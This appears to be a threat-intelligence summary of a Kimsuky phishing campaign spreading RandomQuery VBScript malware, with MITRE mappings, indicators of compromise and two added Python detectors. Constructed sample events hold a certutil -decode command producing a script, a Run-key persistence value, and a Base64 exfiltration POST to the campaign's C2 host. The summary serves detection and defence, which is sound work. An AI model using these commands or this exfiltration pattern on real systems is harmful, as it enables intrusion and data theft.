Keypoints
- Kimsuky distributed a VBScript-only RandomQuery variant via CHM attachments inside password-protected archives sent in targeted phishing emails.
- The CHM contains a malicious Shortcut that writes a Base64 blob (e.g., mini.dat), decodes it with certutil to create a VBScript (e.g., mini.vbs), and establishes persistence via a Run registry key.
- RandomQuery configures Internet Explorer/Edge registry settings, uses Microsoft.XMLHTTP to fetch and execute the second-stage VBScript, and performs reconnaissance via WMI queries.
- The malware gathers three data classes: Basic System (Win32_ComputerSystem/Win32_OperatingSystem/Win32_Processor), Specific Folder (ShellSpecialFolderConstants IDs like Desktop, Documents, Downloads), and Process List (Win32_Process).
- Collected data is Base64-encoded and exfiltrated via HTTP POST to C2 URLs (examples include file.com-port.space/indeed/show.php?query=97) using a distinctive boundary string.
- Kimsuky uses purchased infrastructure with uncommon TLDs (.space, .asia, .click, .online) and domains that mimic .com naming to blend into links; registrar Onamae and ABLENET VPS hosting were observed.
MITRE Techniques
- [T1566] Phishing – Use of targeted emails with malicious CHM attachments to deliver payloads. (‘The attached document is a CHM file stored in a password-protected archive.’)
- [T1204.002] User Execution: Malicious File – The CHM requires a user click to trigger the malicious Shortcut that creates and decodes the payload files. (‘Consistent with known Kimsuky tactics, the CHM file contains a malicious Shortcut object that activates on the Click event.’)
- [T1218] Signed Binary Proxy Execution (certutil) – certutil is abused to decode a Base64 blob into a VBScript, enabling covert payload creation. (‘Decodes the file using the certutil utility, creating a VB script…’)
- [T1547.001] Registry Run Keys / Startup Folder – Persistence achieved by adding the created VBScript to the user’s Run registry key for execution at startup. (‘Establishes persistence by editing the HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run registry key…’)
- [T1071.001] Application Layer Protocol: Web Protocols (HTTP/S) – The VBScript issues HTTP GET/POST requests to C2 URLs to retrieve and execute second-stage payloads and to send exfiltrated data. (‘The VB script issues a HTTP GET request to a C2 server URL…’)
- [T1041] Exfiltration Over C2 Channel – Collected reconnaissance data is Base64-encoded and sent via HTTP POST to attacker-controlled endpoints. (‘RandomQuery first Base64-encodes it, and then constructs and issues an HTTP POST request containing the information to a C2 server URL…’)
- [T1047] Windows Management Instrumentation – WMI classes (Win32_ComputerSystem, Win32_OperatingSystem, Win32_Processor, Win32_Process) are queried to collect system, hardware, and process details. (‘gathers system and hardware information using the Win32_ComputerSystem, Win32_OperatingSystem, and Win32_Processor WMI classes…’)
- [T1083] File and Directory Discovery – Enumeration of user and system directories using ShellSpecialFolderConstants IDs to list files and directories of interest. (‘enumerates subdirectories and files within particular directories by specifying them using ID numbers of the Windows ShellSpecialFolderConstants enumeration…’)
- [T1057] Process Discovery – Enumeration of running processes and session IDs via Win32_Process to build a process list. (‘enumerates the process and session IDs of running processes using the Win32_Process WMI class…’)
- [T1583.003] Domain Registration – Acquisition of infrastructure using less-common TLDs and deceptive domain naming to host payloads and C2. (‘use of less common top-level domains (TLDs) for their infrastructure, such as .space, .asia, .click, and .online…’)
Indicators of Compromise
- [SHA1 Hash] Sample payload hashes – 96d29a2d554b36d6fb7373ae52765850c17b68df, 84398dcd52348eec37738b27af9682a3a1a08492, and 4 more hashes
- [Domains] Observed malicious domains – com-port[.]space, com-def[.]asia, com-www[.]click, and other domains listed in the campaign
- [URLs/C2] Example C2/exfiltration endpoints – http://file.com-port.space/indeed/show.php?query=50, http://file.com-port.space/indeed/show.php?query=97
- [Email Address] Phishing sender – bandi00413[@]daum.net used to send lure emails
- [File names/paths] Dropped and generated files – %USERPROFILE%\Links\mini.dat (Base64 blob), %USERPROFILE%\Links\mini.vbs (decoded VBScript)
The technical attack flow begins with targeted phishing messages (sent from Daum addresses) containing a password-protected archive with a CHM lure. The CHM includes a malicious Shortcut object that, when clicked, writes a Base64-encoded blob (e.g., mini.dat) into %USERPROFILE%\Links, uses certutil to decode that blob into a VBScript (mini.vbs), and establishes persistence by adding the VBScript to HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run so it executes at user logon.
The VBScript RandomQuery variant configures Internet Explorer/Edge-related registry values (to suppress first-run prompts and prevent redirection), then uses Microsoft.XMLHTTP to request a second-stage VBScript from attacker-controlled URLs. Once active, RandomQuery performs reconnaissance via WMI and Shell interfaces: it queries Win32_ComputerSystem, Win32_OperatingSystem, and Win32_Processor for Basic System details; enumerates files and subdirectories in targeted locations using ShellSpecialFolderConstants IDs (Desktop, Documents, Downloads, Program Files, etc.) for Specific Folder data; and enumerates running processes and session IDs through Win32_Process to build a Process List.
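The delivery chain above (CHM viewer spawning a command interpreter, certutil decoding a Base64 blob into a .vbs, a Run key pointing at that script) leaves a recognisable trail in process-creation and registry telemetry. The following detector is an added example written for this summary, not code from SentinelOne or from the campaign; the event records are constructed Sysmon-style dictionaries (event id 1 for process creation, 13 for registry value set), and field names, host names and user paths are assumptions.

```python
"""Correlate host telemetry for the CHM -> certutil -decode -> Run-key chain.
Added example: the event records below are constructed, not real telemetry."""
import re

# Constructed Sysmon-like events. WS01 shows the full chain; WS02 shows a
# benign certutil -encode that must not fire.
SAMPLE_EVENTS = [
    {"id": 1, "host": "WS01", "image": r"C:\Windows\hh.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": r'"C:\Windows\hh.exe" C:\Users\u\Downloads\lure.chm'},
    {"id": 1, "host": "WS01", "image": r"C:\Windows\System32\cmd.exe",
     "parent": r"C:\Windows\hh.exe",
     "cmdline": r'cmd.exe /c echo <base64> > C:\Users\u\Links\mini.dat'},
    {"id": 1, "host": "WS01", "image": r"C:\Windows\System32\certutil.exe",
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"certutil -decode C:\Users\u\Links\mini.dat C:\Users\u\Links\mini.vbs"},
    {"id": 13, "host": "WS01", "image": r"C:\Windows\System32\reg.exe",
     "target": r"HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\mini",
     "details": r"wscript.exe C:\Users\u\Links\mini.vbs"},
    {"id": 1, "host": "WS02", "image": r"C:\Windows\System32\certutil.exe",
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"certutil -encode C:\temp\cert.cer C:\temp\cert.txt"},
]

# certutil -decode whose output is a script-host file (vbs/vbe/js/wsf).
CERTUTIL_DECODE = re.compile(r"certutil(\.exe)?\s+.*-decode\b.*\.(vbs|vbe|js|wsf)\b", re.I)
RUN_KEY = re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", re.I)
SCRIPT_FILE = re.compile(r"\.(vbs|vbe|js|wsf)\b", re.I)
INTERPRETERS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe"}

# Stages that together make up the chain described in the report.
CHAIN = {"T1204.002", "T1218", "T1547.001"}


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def evaluate(event):
    """Return (technique, reason) tags for one event; [] when nothing matches."""
    tags = []
    if event["id"] == 1:
        img, parent = basename(event["image"]), basename(event.get("parent", ""))
        if parent == "hh.exe" and img in INTERPRETERS:
            tags.append(("T1204.002", "CHM viewer (hh.exe) spawned a command interpreter"))
        if img == "certutil.exe" and CERTUTIL_DECODE.search(event["cmdline"]):
            tags.append(("T1218", "certutil -decode producing a script file"))
    elif event["id"] == 13:
        if RUN_KEY.search(event["target"]) and SCRIPT_FILE.search(event["details"]):
            tags.append(("T1547.001", "Run key value pointing at a script file"))
    return tags


def detect(events):
    """Per host, the set of techniques observed (only hosts with at least one hit)."""
    per_host = {}
    for ev in events:
        for tech, _reason in evaluate(ev):
            per_host.setdefault(ev["host"], set()).add(tech)
    return {host: sorted(techs) for host, techs in per_host.items()}


def hosts_with_full_chain(events):
    """Hosts on which every stage of the CHM -> certutil -> Run-key chain was seen."""
    return sorted(h for h, techs in detect(events).items() if CHAIN <= set(techs))


if __name__ == "__main__":
    for host, techs in detect(SAMPLE_EVENTS).items():
        print(host, techs)
    print("full chain on:", hosts_with_full_chain(SAMPLE_EVENTS))
```

Each stage alone is noisy (certutil is used legitimately, Run keys are added by installers), so the value is in the correlation: a single host producing all three within a short window is a strong signal, and the hh.exe parent is the distinguishing detail for the CHM lure specifically.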
Collected data is Base64-encoded, packaged into HTTP POST requests (using a consistent boundary string such as c2xkanZvaXU4OTA) and transmitted to the same or similar C2 endpoints that hosted the payload (examples include file.com-port.space/indeed/show.php with varying query parameters). Infrastructure supporting these operations relied on domain registrations using uncommon TLDs (.space, .asia, .click, .online) and domain names crafted to resemble .com addresses; observed registrar and hosting services included Onamae and ABLENET VPS Hosting.
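The exfiltration traffic described above carries three network-level indicators: a lookalike host name built from a "com-" label on an uncommon TLD, the /indeed/show.php path with a numeric query parameter, and the fixed multipart boundary string. The inspector below is an added example written for this summary, not code from SentinelOne or from the campaign. It assumes the POST body is a multipart form whose first part holds the Base64-encoded reconnaissance data (the exact body layout is not given on this page), and the sample request, its reconnaissance text and the benign comparison request are constructed.

```python
"""Flag outbound HTTP requests matching the RandomQuery C2/exfiltration pattern
and decode the Base64 payload for the analyst. Added example; the requests
below are constructed, and the multipart body layout is an assumption."""
import base64
import binascii
import re
from urllib.parse import parse_qs, urlsplit

KNOWN_BOUNDARY = "c2xkanZvaXU4OTA"          # boundary string reported in the campaign
C2_PATH = re.compile(r"^/indeed/show\.php$")  # C2 path reported in the campaign
LOOKALIKE_TLDS = {"space", "asia", "click", "online"}

# Constructed reconnaissance text standing in for the WMI output the script collects.
RECON = "Win32_ComputerSystem=WS01;Win32_OperatingSystem=Windows 10;Win32_Processor=x64"

SAMPLE_REQUEST = (
    "POST /indeed/show.php?query=97 HTTP/1.1\r\n"
    "Host: file.com-port.space\r\n"
    "Content-Type: multipart/form-data; boundary=c2xkanZvaXU4OTA\r\n"
    "\r\n"
    "--c2xkanZvaXU4OTA\r\n"
    'Content-Disposition: form-data; name="data"\r\n'
    "\r\n" + base64.b64encode(RECON.encode()).decode() + "\r\n"
    "--c2xkanZvaXU4OTA--\r\n"
)

BENIGN_REQUEST = (
    "GET /index.html HTTP/1.1\r\n"
    "Host: www.example.com\r\n"
    "\r\n"
)


def lookalike_domain(host):
    """True for hosts like file.com-port.space: a 'com-' label under an uncommon TLD."""
    labels = host.lower().split(".")
    return (len(labels) >= 2 and labels[-1] in LOOKALIKE_TLDS
            and any(label.startswith("com-") for label in labels[:-1]))


def parse_request(raw):
    """Split a raw HTTP/1.1 request into method, target, header dict and body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {k.strip().lower(): v.strip()
               for k, v in (line.split(":", 1) for line in lines[1:] if ":" in line)}
    return method, target, headers, body


def first_part_payload(body, boundary):
    """Return the content of the first multipart part, or '' if there is none."""
    parts = [p for p in body.split("--" + boundary) if p.strip() and p.strip() != "--"]
    return parts[0].split("\r\n\r\n", 1)[-1].strip() if parts else ""


def inspect(raw):
    """Return the indicators matched by one request and the decoded payload, if any."""
    method, target, headers, body = parse_request(raw)
    host = headers.get("host", "")
    url = urlsplit(target)
    reasons = []
    if lookalike_domain(host):
        reasons.append("lookalike domain on uncommon TLD")
    if C2_PATH.match(url.path):
        reasons.append("known C2 path")
    match = re.search(r"boundary=([^\s;]+)", headers.get("content-type", ""))
    boundary = match.group(1) if match else None
    if boundary == KNOWN_BOUNDARY:
        reasons.append("RandomQuery boundary string")
    decoded = None
    if method == "POST" and boundary:
        try:
            decoded = base64.b64decode(first_part_payload(body, boundary),
                                       validate=True).decode("utf-8", "replace")
        except (binascii.Error, ValueError):
            decoded = None   # body is not clean Base64; leave it for manual review
    return {"host": host, "query": parse_qs(url.query).get("query", [None])[0],
            "reasons": reasons, "decoded": decoded}


if __name__ == "__main__":
    print(inspect(SAMPLE_REQUEST))
    print(inspect(BENIGN_REQUEST))
```

The boundary and path checks are exact-match indicators and will age as the infrastructure changes; the lookalike-domain heuristic is the durable part, since it encodes the naming pattern the actor used to make the links blend in rather than any one domain.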
Read more: https://www.sentinelone.com/labs/kimsuky-ongoing-campaign-using-tailored-reconnaissance-toolkit/